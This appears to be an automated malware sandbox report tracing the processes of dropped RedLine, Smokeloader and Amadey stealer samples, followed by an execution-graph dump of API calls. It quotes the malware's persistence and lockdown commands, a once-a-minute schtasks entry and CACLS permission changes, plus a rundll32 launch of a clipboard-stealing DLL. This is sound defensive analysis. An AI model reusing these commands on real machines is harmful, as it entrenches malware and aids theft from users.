                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    Target ID:2
                                                                    Start time:21:30:01
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe
                                                                    Imagebase:0x400000
                                                                    File size:372736 bytes
                                                                    MD5 hash:AD3805672C5FE617D88DCE7E50E56B9F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.367095576.0000000000767000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    Target ID:7
                                                                    Start time:21:30:12
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                    Imagebase:0x7ff673770000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:11
                                                                    Start time:21:30:20
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                    Imagebase:0x7ff673770000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:14
                                                                    Start time:21:30:50
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                    Imagebase:0xa00000
                                                                    File size:11264 bytes
                                                                    MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:moderate

                                                                    Target ID:15
                                                                    Start time:21:31:06
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                    Imagebase:0x11d0000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000F.00000000.400766948.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:moderate

                                                                    Target ID:16
                                                                    Start time:21:31:06
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                                                                    Imagebase:0x830000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000010.00000000.402656135.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000010.00000002.785140671.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:moderate

                                                                    Target ID:17
                                                                    Start time:21:31:07
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                                                                    Imagebase:0x1330000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:18
                                                                    Start time:21:31:07
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff745070000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:19
                                                                    Start time:21:31:07
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                                                                    Imagebase:0xb0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:20
                                                                    Start time:21:31:07
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff745070000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:21
                                                                    Start time:21:31:08
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                    Imagebase:0xb0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:22
                                                                    Start time:21:31:08
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:CACLS "mnolyk.exe" /P "user:N"
                                                                    Imagebase:0x830000
                                                                    File size:27648 bytes
                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:23
                                                                    Start time:21:31:08
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                                                                    Imagebase:0x830000
                                                                    File size:27648 bytes
                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:24
                                                                    Start time:21:31:08
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                    Imagebase:0xb0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:25
                                                                    Start time:21:31:09
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:CACLS "..\4b9a106e76" /P "user:N"
                                                                    Imagebase:0x830000
                                                                    File size:27648 bytes
                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:26
                                                                    Start time:21:31:09
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                                                                    Imagebase:0x830000
                                                                    File size:27648 bytes
                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:27
                                                                    Start time:21:31:10
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Imagebase:0x830000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001B.00000002.410254197.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001B.00000000.409483823.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                    Target ID:28
                                                                    Start time:21:31:10
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                    Imagebase:0x12d0000
                                                                    File size:61952 bytes
                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:31
                                                                    Start time:21:32:01
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Imagebase:0x830000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001F.00000002.519184660.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000001F.00000000.518847759.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                    Target ID:35
                                                                    Start time:21:33:00
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Imagebase:0x830000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000023.00000002.646081844.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000023.00000000.645377200.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security

                                                                    Target ID:36
                                                                    Start time:21:34:00
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Imagebase:0x830000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000024.00000000.773987737.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000024.00000002.774229388.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security


                                                                      Execution Graph

                                                                      Execution Coverage:26.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:27%
                                                                      Total number of Nodes:967
                                                                      Total number of Limit Nodes:42
3231->3232 3233 11d6c17 _exit 3231->3233 3234 11d6c27 _cexit 3232->3234 3235 11d6c32 3232->3235 3233->3232 3234->3235 3236 11d7270 _except_handler4_common 3237 11d69b0 3238 11d69b5 3237->3238 3246 11d6fbe GetModuleHandleW 3238->3246 3240 11d69c1 __set_app_type __p__fmode __p__commode 3241 11d69f9 3240->3241 3242 11d6a0e 3241->3242 3243 11d6a02 __setusermatherr 3241->3243 3248 11d71ef _controlfp 3242->3248 3243->3242 3245 11d6a13 3247 11d6fcf 3246->3247 3247->3240 3248->3245 3249 11d34f0 3250 11d3504 3249->3250 3268 11d35b8 3249->3268 3251 11d35be GetDesktopWindow 3250->3251 3252 11d351b 3250->3252 3250->3268 3254 11d43d0 11 API calls 3251->3254 3255 11d354f 3252->3255 3256 11d351f 3252->3256 3253 11d3526 3258 11d35d6 3254->3258 3255->3253 3260 11d3559 ResetEvent 3255->3260 3256->3253 3259 11d352d TerminateThread EndDialog 3256->3259 3257 11d3671 EndDialog 3257->3253 3261 11d361d SetWindowTextA CreateThread 3258->3261 3262 11d35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3258->3262 3259->3253 3263 11d44b9 20 API calls 3260->3263 3261->3253 3264 11d3646 3261->3264 3262->3261 3265 11d3581 3263->3265 3266 11d44b9 20 API calls 3264->3266 3267 11d359b SetEvent 3265->3267 3269 11d358a SetEvent 3265->3269 3266->3268 3270 11d3680 4 API calls 3267->3270 3268->3253 3268->3257 3269->3253 3270->3268 3271 11d6ef0 3272 11d6f2d 3271->3272 3274 11d6f02 3271->3274 3273 11d6f27 ?terminate@ 3273->3272 3274->3272 3274->3273 3275 11d6bef _XcptFilter 2354 11d4ca0 GlobalAlloc 2355 11d6a60 2372 11d7155 2355->2372 2357 11d6a65 2358 11d6a76 GetStartupInfoW 2357->2358 2359 11d6a93 2358->2359 2360 11d6aa8 2359->2360 2361 11d6aaf Sleep 2359->2361 2362 11d6ac7 _amsg_exit 2360->2362 2364 11d6ad1 2360->2364 2361->2359 2362->2364 2363 11d6b13 _initterm 2368 11d6b2e __IsNonwritableInCurrentImage 2363->2368 2364->2363 2366 11d6af4 2364->2366 2364->2368 2365 11d6bd6 _ismbblead 2365->2368 2367 11d6c1e 2367->2366 2369 11d6c27 _cexit 2367->2369 2368->2365 2368->2367 2371 11d6bbe exit 2368->2371 
2377 11d2bfb GetVersion 2368->2377 2369->2366 2371->2368 2373 11d717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2372->2373 2374 11d717a 2372->2374 2376 11d71cd 2373->2376 2374->2373 2375 11d71e2 2374->2375 2375->2357 2376->2375 2378 11d2c0f 2377->2378 2379 11d2c50 2377->2379 2378->2379 2381 11d2c13 GetModuleHandleW 2378->2381 2394 11d2caa memset memset memset 2379->2394 2381->2379 2383 11d2c22 GetProcAddress 2381->2383 2383->2379 2391 11d2c34 2383->2391 2384 11d2c8e 2386 11d2c9e 2384->2386 2387 11d2c97 CloseHandle 2384->2387 2386->2368 2387->2386 2391->2379 2392 11d2c89 2489 11d1f90 2392->2489 2506 11d468f FindResourceA SizeofResource 2394->2506 2397 11d2d2d CreateEventA SetEvent 2398 11d468f 7 API calls 2397->2398 2400 11d2d57 2398->2400 2399 11d44b9 20 API calls 2401 11d2f06 2399->2401 2402 11d2d7d 2400->2402 2403 11d2d5b 2400->2403 2406 11d6ce0 4 API calls 2401->2406 2405 11d2e1f 2402->2405 2409 11d468f 7 API calls 2402->2409 2404 11d44b9 20 API calls 2403->2404 2407 11d2d6e 2404->2407 2511 11d5c9e 2405->2511 2410 11d2c62 2406->2410 2407->2401 2412 11d2d9f 2409->2412 2410->2384 2435 11d2f1d 2410->2435 2412->2403 2415 11d2da3 CreateMutexA 2412->2415 2413 11d2e3a 2417 11d2e43 2413->2417 2418 11d2e52 FindResourceA 2413->2418 2414 11d2e30 2414->2399 2415->2405 2416 11d2dbd GetLastError 2415->2416 2416->2405 2419 11d2dca 2416->2419 2537 11d2390 2417->2537 2420 11d2e6e 2418->2420 2421 11d2e64 LoadResource 2418->2421 2423 11d2dea 2419->2423 2424 11d2dd5 2419->2424 2420->2407 2552 11d36ee GetVersionExA 2420->2552 2421->2420 2426 11d44b9 20 API calls 2423->2426 2425 11d44b9 20 API calls 2424->2425 2427 11d2de8 2425->2427 2428 11d2dff 2426->2428 2430 11d2e04 CloseHandle 2427->2430 2428->2405 2428->2430 2430->2401 2434 11d6517 24 API calls 2434->2407 2436 11d2f6c 2435->2436 2437 11d2f3f 2435->2437 2661 11d5164 2436->2661 2438 11d2f5f 2437->2438 2641 11d51e5 2437->2641 2794 11d3a3f 2438->2794 2442 11d2f71 2445 
11d3041 2442->2445 2676 11d55a0 2442->2676 2447 11d6ce0 4 API calls 2445->2447 2449 11d2c6b 2447->2449 2476 11d52b6 2449->2476 2450 11d2f86 GetSystemDirectoryA 2451 11d658a CharPrevA 2450->2451 2452 11d2fab LoadLibraryA 2451->2452 2453 11d2ff7 FreeLibrary 2452->2453 2454 11d2fc0 GetProcAddress 2452->2454 2456 11d3017 SetCurrentDirectoryA 2453->2456 2457 11d3006 2453->2457 2454->2453 2455 11d2fd6 DecryptFileA 2454->2455 2455->2453 2464 11d2ff0 2455->2464 2458 11d3054 2456->2458 2459 11d3026 2456->2459 2457->2456 2726 11d621e GetWindowsDirectoryA 2457->2726 2461 11d3061 2458->2461 2737 11d3b26 2458->2737 2463 11d44b9 20 API calls 2459->2463 2461->2445 2466 11d307a 2461->2466 2746 11d256d 2461->2746 2468 11d3037 2463->2468 2464->2453 2470 11d3098 2466->2470 2757 11d3ba2 2466->2757 2813 11d6285 GetLastError 2468->2813 2470->2445 2474 11d30af 2470->2474 2815 11d4169 2474->2815 2477 11d52d6 2476->2477 2486 11d5316 2476->2486 2480 11d5300 LocalFree LocalFree 2477->2480 2482 11d52eb SetFileAttributesA DeleteFileA 2477->2482 2478 11d5374 2479 11d538c 2478->2479 3124 11d1fe1 2478->3124 2481 11d6ce0 4 API calls 2479->2481 2480->2477 2480->2486 2483 11d2c72 2481->2483 2482->2480 2483->2384 2483->2392 2485 11d535e SetCurrentDirectoryA 2488 11d2390 13 API calls 2485->2488 2486->2478 2486->2485 2487 11d65e8 4 API calls 2486->2487 2487->2485 2488->2478 2490 11d1f9a 2489->2490 2493 11d1f9f 2489->2493 2491 11d1ea7 15 API calls 2490->2491 2491->2493 2492 11d1fc0 2495 11d1fcf ExitWindowsEx 2492->2495 2496 11d1ee2 GetCurrentProcess OpenProcessToken 2492->2496 2497 11d1fd9 2492->2497 2493->2492 2494 11d44b9 20 API calls 2493->2494 2493->2497 2494->2492 2495->2497 2499 11d1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2496->2499 2501 11d1f0e 2496->2501 2497->2384 2500 11d1f6b ExitWindowsEx 2499->2500 2499->2501 2500->2501 2502 11d1f1f 2500->2502 2503 11d44b9 20 API calls 2501->2503 2504 11d6ce0 4 API calls 2502->2504 2503->2502 2505 11d1f8c 2504->2505 2505->2384 2507 
11d2d1a 2506->2507 2508 11d46b6 2506->2508 2507->2397 2507->2414 2508->2507 2509 11d46be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 11d46df memcpy_s FreeResource 2509->2510 2510->2507 2512 11d5e17 2511->2512 2535 11d5cc3 2511->2535 2514 11d6ce0 4 API calls 2512->2514 2513 11d5dd0 2513->2512 2517 11d5dec GetModuleFileNameA 2513->2517 2516 11d2e2c 2514->2516 2515 11d5ced CharNextA 2515->2535 2516->2413 2516->2414 2517->2512 2518 11d5e0a 2517->2518 2587 11d66c8 2518->2587 2520 11d6218 2596 11d6e2a 2520->2596 2523 11d5e36 CharUpperA 2524 11d61d0 2523->2524 2523->2535 2525 11d44b9 20 API calls 2524->2525 2526 11d61e7 2525->2526 2527 11d61f7 ExitProcess 2526->2527 2528 11d61f0 CloseHandle 2526->2528 2528->2527 2529 11d5f9f CharUpperA 2529->2535 2530 11d5f59 CompareStringA 2530->2535 2531 11d6003 CharUpperA 2531->2535 2532 11d5edc CharUpperA 2532->2535 2533 11d60a2 CharUpperA 2533->2535 2534 11d667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2513 2535->2515 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 11d658a 2535->2592 2538 11d24cb 2537->2538 2541 11d23b9 2537->2541 2539 11d6ce0 4 API calls 2538->2539 2540 11d24dc 2539->2540 2540->2407 2541->2538 2542 11d23e9 FindFirstFileA 2541->2542 2542->2538 2550 11d2407 2542->2550 2543 11d2479 2547 11d2488 SetFileAttributesA DeleteFileA 2543->2547 2544 11d2421 lstrcmpA 2545 11d24a9 FindNextFileA 2544->2545 2546 11d2431 lstrcmpA 2544->2546 2548 11d24bd FindClose RemoveDirectoryA 2545->2548 2545->2550 2546->2545 2546->2550 2547->2545 2548->2538 2549 11d658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2545 2550->2549 2551 11d2390 5 API calls 2550->2551 2551->2550 2556 11d3737 2552->2556 2558 11d372d 2552->2558 2553 11d44b9 20 API calls 2566 11d39fc 2553->2566 2554 11d6ce0 4 API calls 2555 11d2e92 2554->2555 2555->2401 2555->2407 2567 11d18a3 2555->2567 2556->2558 2559 11d38a4 2556->2559 2556->2566 2603 11d28e8 2556->2603 2558->2553 2558->2566 
2559->2558 2560 11d39c1 MessageBeep 2559->2560 2559->2566 2561 11d681f 10 API calls 2560->2561 2562 11d39ce 2561->2562 2563 11d39d8 MessageBoxA 2562->2563 2565 11d67c9 EnumResourceLanguagesA 2562->2565 2563->2566 2565->2563 2566->2554 2568 11d19b8 2567->2568 2569 11d18d5 2567->2569 2571 11d6ce0 4 API calls 2568->2571 2632 11d17ee LoadLibraryA 2569->2632 2573 11d19d5 2571->2573 2573->2407 2573->2434 2574 11d18e5 GetCurrentProcess OpenProcessToken 2574->2568 2575 11d1900 GetTokenInformation 2574->2575 2576 11d1918 GetLastError 2575->2576 2577 11d19aa CloseHandle 2575->2577 2576->2577 2578 11d1927 LocalAlloc 2576->2578 2577->2568 2579 11d19a9 2578->2579 2580 11d1938 GetTokenInformation 2578->2580 2579->2577 2581 11d194e AllocateAndInitializeSid 2580->2581 2582 11d19a2 LocalFree 2580->2582 2581->2582 2586 11d196e 2581->2586 2582->2579 2583 11d1999 FreeSid 2583->2582 2584 11d1975 EqualSid 2585 11d198c 2584->2585 2584->2586 2585->2583 2586->2583 2586->2584 2586->2585 2588 11d66d5 2587->2588 2589 11d66f3 2588->2589 2591 11d66e5 CharNextA 2588->2591 2599 11d6648 2588->2599 2589->2512 2591->2588 2593 11d659b 2592->2593 2593->2593 2594 11d65ab 2593->2594 2595 11d65b8 CharPrevA 2593->2595 2594->2535 2595->2594 2602 11d6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 11d621d 2600 11d665d IsDBCSLeadByte 2599->2600 2601 11d6668 2599->2601 2600->2601 2601->2588 2602->2598 2604 11d2a62 2603->2604 2611 11d290d 2603->2611 2605 11d2a6e GlobalFree 2604->2605 2606 11d2a75 2604->2606 2605->2606 2606->2559 2608 11d2955 GlobalAlloc 2608->2604 2609 11d2968 GlobalLock 2608->2609 2609->2604 2609->2611 2610 11d2a20 GlobalUnlock 2610->2611 2611->2604 2611->2608 2611->2610 2612 11d2a80 GlobalUnlock 2611->2612 2613 11d2773 2611->2613 2612->2604 2614 11d27a3 CharUpperA CharNextA CharNextA 2613->2614 2615 11d28b2 2613->2615 2616 11d27db 2614->2616 2617 11d28b7 GetSystemDirectoryA 2614->2617 2615->2617 2619 11d28a8 GetWindowsDirectoryA 
